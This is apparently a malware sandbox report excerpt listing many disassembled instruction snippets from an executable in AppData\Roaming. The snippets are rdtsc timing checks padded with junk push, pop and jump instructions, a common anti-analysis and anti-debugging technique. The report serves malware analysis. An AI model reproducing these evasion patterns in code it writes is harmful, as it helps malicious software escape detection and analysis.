Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C1EB7 second address: 5C1ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FBC912593FAh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C2445 second address: 5C244C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C244C second address: 5C2451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C2451 second address: 5C2457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C7F56 second address: 5C7F68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FBC912593F6h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5C7F68 second address: 5C7F7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CAEE2 second address: 5CAEEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBC912593F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CB02A second address: 5CB031 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CB311 second address: 5CB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5CB839 second address: 5CB85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FBC9118B8B2h 0x0000000c jno 00007FBC9118B8A6h 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2383 second address: 5D2387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2387 second address: 5D2397 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007FBC9118B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2397 second address: 5D23A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007FBC912593F6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2616 second address: 5D261A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2D81 second address: 5D2D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D2D87 second address: 5D2D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8AEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D3090 second address: 5D309A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D64D1 second address: 5D64DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D64DF second address: 5D6504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC91259408h 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5D6504 second address: 5D6524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBC9118B8B7h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 521E93 second address: 521E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 521E97 second address: 521EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBC9118B8B6h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBC9118B8ADh 0x00000012 jc 00007FBC9118B8A6h 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5DBB14 second address: 5DBB18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 521F03 second address: 521F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5E95DF second address: 5E95E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5EC225 second address: 5EC22B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5EEAC5 second address: 5EEB01 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBC912593F6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007FBC912593F8h 0x00000012 pushad 0x00000013 jmp 00007FBC912593FCh 0x00000018 jmp 00007FBC91259409h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F910E second address: 5F911F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F911F second address: 5F9138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FFh 0x00000007 ja 00007FBC91259402h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F9138 second address: 5F9153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBC9118B8A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FBC9118B8A6h 0x00000015 jne 00007FBC9118B8A6h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5F9153 second address: 5F9174 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBC91259403h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FBC912593F6h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5FC9B1 second address: 5FC9BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5FC9BA second address: 5FC9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 5FC9C0 second address: 5FC9CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC9118B8AEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60574E second address: 605752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 605752 second address: 60576B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FBC9118B8A6h 0x00000012 jns 00007FBC9118B8A6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60576B second address: 605777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FBC912593F6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 605777 second address: 60579D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC9118B8A6h 0x00000008 jmp 00007FBC9118B8B4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FBC9118B8A6h 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60438D second address: 604393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604393 second address: 60439D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBC9118B8A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60439D second address: 6043A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043A3 second address: 6043B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC9118B8B2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043B9 second address: 6043F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBC91259408h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007FBC912593FCh 0x00000017 jns 00007FBC912593F6h 0x0000001d pushad 0x0000001e jng 00007FBC912593F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043F2 second address: 6043F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6043F9 second address: 604422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FBC912593FFh 0x0000000a jmp 00007FBC91259400h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604422 second address: 604426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604578 second address: 60457C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 60469C second address: 6046A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046A1 second address: 6046D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259409h 0x00000007 pushad 0x00000008 jnp 00007FBC912593F6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jl 00007FBC91259414h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046D2 second address: 6046D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046D8 second address: 6046DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6046DC second address: 6046E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 604880 second address: 6048AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC91259402h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FBC91259400h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6048AA second address: 6048DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBC9118B8B4h 0x00000008 jbe 00007FBC9118B8A6h 0x0000000e jmp 00007FBC9118B8AAh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6048DB second address: 6048F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC912593FAh 0x00000007 jnc 00007FBC912593F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 jno 00007FBC912593F6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6048F9 second address: 6048FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 605406 second address: 605426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBC912593F6h 0x0000000a pop esi 0x0000000b jmp 00007FBC91259402h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 609FB9 second address: 609FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 609FBD second address: 609FC9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBC912593F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61BE27 second address: 61BE2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD36 second address: 61FD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD3A second address: 61FD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD40 second address: 61FD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD46 second address: 61FD61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBC9118B8ADh 0x00000008 jl 00007FBC9118B8A6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 61FD61 second address: 61FD65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 62DCA6 second address: 62DCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8AFh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 62DCB9 second address: 62DCBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CA8 second address: 645CBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC9118B8AFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CBC second address: 645CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FBC912593FDh 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007FBC91259403h 0x00000019 jnp 00007FBC912593F6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CF8 second address: 645CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 645CFC second address: 645D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6465FC second address: 646606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 646606 second address: 64660A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64660A second address: 64660E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64679D second address: 6467A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBC912593F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64693C second address: 64695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBC9118B8B8h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64695B second address: 646961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 646961 second address: 64697F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FBC9118B8A6h 0x00000011 jmp 00007FBC9118B8ADh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64697F second address: 646983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 649547 second address: 64954D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 6495E5 second address: 649600 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FBC912593FBh 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FBC912593F6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 649600 second address: 649604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 649BAB second address: 649BB5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBC912593FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64ACD8 second address: 64ACDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64ACDC second address: 64ACEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FBC912593F6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64C45E second address: 64C464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 64C464 second address: 64C49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FBC912593F8h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d push edx 0x0000000e jmp 00007FBC91259402h 0x00000013 ja 00007FBC912593F6h 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBC912593FEh 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BB0 second address: 4C60BD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ah 0x00000005 call 00007FBC9118B8B5h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BD5 second address: 4C60BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BD9 second address: 4C60BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60BDF second address: 4C60C66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FBC91259404h 0x00000013 add cx, A218h 0x00000018 jmp 00007FBC912593FBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FBC91259408h 0x00000024 xor eax, 24DB0C78h 0x0000002a jmp 00007FBC912593FBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov ah, 67h 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 jmp 00007FBC912593FBh 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FBC91259405h 0x00000043 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60C66 second address: 4C60C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe RDTSC instruction interceptor: First address: 4C60C6C second address: 4C60C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
